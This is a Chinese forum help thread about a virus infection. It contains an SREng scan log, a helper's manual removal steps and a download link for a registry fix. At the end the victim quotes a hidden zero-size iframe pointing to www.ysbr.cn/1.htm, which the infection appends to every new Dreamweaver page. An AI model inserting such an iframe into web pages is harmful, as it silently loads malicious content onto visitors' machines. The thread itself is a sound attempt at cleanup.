    [C:\Program Files\Rising\Rav\engine.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 20]
    [C:\Program Files\Rising\Rav\PostTrt.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 8]
    [C:\Program Files\Rising\Rav\UnExe.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 9]
    [C:\Program Files\Rising\Rav\ScanExec.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 15]
    [C:\Program Files\Rising\Rav\ScanEx.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 30]
    [C:\Program Files\Rising\Rav\ExtFile.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 23]
    [C:\Program Files\Rising\Rav\NvFile.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 11]
    [C:\Program Files\Rising\Rav\ScanMac.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 13]
    [C:\Program Files\Rising\Rav\ScanSct.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 16]
    [C:\Program Files\Rising\Rav\ExtOLE.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 11]
    [C:\Program Files\Rising\Rav\Unpacker.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 17]
    [C:\Program Files\Rising\Rav\ScanPack.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 18]
    [C:\Program Files\Rising\Rav\RsVM.dll]  [N/A, 19, 0, 0, 13]
    [C:\Program Files\Rising\Rav\Uroutine.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 19]
    [C:\Program Files\Rising\Rav\ExtMail.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 13]
[PID: 924][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1076][C:\Program Files\Rising\Rav\RavStub.exe]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 4]
    [C:\Program Files\Rising\Rav\RsCommX.dll]  [rising, 18, 0, 0, 1]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
[PID: 1164][C:\WINDOWS\system32\spoolsv.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1284][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1320][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1480][C:\WINDOWS\system32\Dfssvc.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1712][C:\WINDOWS\Explorer.EXE]  [Microsoft Corporation, 6.00.3790.0 (srv03_rtm.030324-2048)]
    [C:\WINDOWS\system32\RavExt.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 7]
    [D:\Program Files\WinRAR\rarext.dll]  [N/A, N/A]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
    [D:\Program Files\Adobe\ActiveX\PDFShell.dll]  [Adobe Systems, Inc., 7.0.0.0]
    [C:\Program Files\Rising\Rav\RavScrCh.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 4]
    [D:\Program Files\Adobe\ActiveX\AcroIEHelper.dll]  [Adobe Systems Incorporated, 7.0.7.2006011200]
[PID: 1812][C:\Program Files\Rising\Rav\RavTask.exe]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 7]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
    [C:\Program Files\Rising\Rav\RSAPPMGR.DLL]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 2]
    [C:\Program Files\Rising\Rav\CfgDll.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 13]
    [C:\Program Files\Rising\Rav\RsCommX.dll]  [rising, 18, 0, 0, 1]
[PID: 1828][C:\Program Files\Rising\Rav\Ravmon.exe]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 36]
    [C:\Program Files\Rising\Rav\RsGuiLib.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 28]
    [C:\Program Files\Rising\Rav\BWList.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 6]
    [C:\Program Files\Rising\Rav\RSAPPMGR.DLL]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 2]
    [C:\Program Files\Rising\Rav\CfgDll.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 13]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
    [C:\Program Files\Rising\Rav\RsCommX.dll]  [rising, 18, 0, 0, 1]
    [C:\Program Files\Rising\Rav\RsXML.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 2]
    [C:\Program Files\Rising\Rav\PngDll.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 5]
[PID: 2040][C:\WINDOWS\system32\wbem\wmiprvse.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 360][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 940][C:\Program Files\Internet Explorer\IEXPLORE.EXE]  [Microsoft Corporation, 6.00.3790.0 (srv03_rtm.030324-2048)]
    [D:\Program Files\Adobe\ActiveX\AcroIEHelper.dll]  [Adobe Systems Incorporated, 7.0.7.2006011200]
    [C:\Program Files\Rising\Rav\RavScrCh.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 4]
    [C:\WINDOWS\system32\Macromed\Flash\Flash8.ocx]  [Macromedia, Inc., 8,0,22,0]
[PID: 1244][E:\soft\杀毒工具\SREng\SREng.exe]  [Smallfrogs Studio, 2.2.6.605]

==================================
文件关联
.TXT  OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  OK. ["C:\WINDOWS\hh.exe" %1]
.HLP  OK. [%SystemRoot%\system32\winhlp32.exe %1]
.INI  OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.VBS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
N/A

==================================

上面是我刚用SREng.exe扫描的日志，请红夜鬼再帮忙费心看一看，实在是麻烦了~~~谢谢！

还要说明一点，我刚才发现无法显示隐藏文件了。点了“显示所有文件和文件夹”应用之后，再打开看，它又自动变回了“不显示隐藏的文件和文件夹”！怎么回事？

运行(双击)SRENG2，点“启动项目，服务，点“Win32服务应用程序”
勾选“隐藏微软服务”选中病毒服务
[HFIORTKOUGIK
[PHZDXDDNVOIRTL
Remote Help Session Manager
，选择“删除服务”
点“设置”选择“否”
重启按F８进入安全模式下
显示隐藏文件
删除： 
C:\WINDOWS\system32\ntsokele.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\清空文件夹

下载：显示隐藏文件，将显示文件导入注册表

下载地址
http://free5.ys168.com/?ufwihgu168

谢谢红夜鬼一直以来的回复！
但是可能我一直忘记了说明一点而导致没彻底解决问题：我在Dreamweaver8里新建一个基本页htm/html的时候，它就会在页面的代码最后面自动加上：<IFRAME SRC="HTTP://www.ysbr.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
我重装Dreamweaver也还是这样，所以应该不是这个软件的问题而是病毒问题。
现在依然是这样~~~~~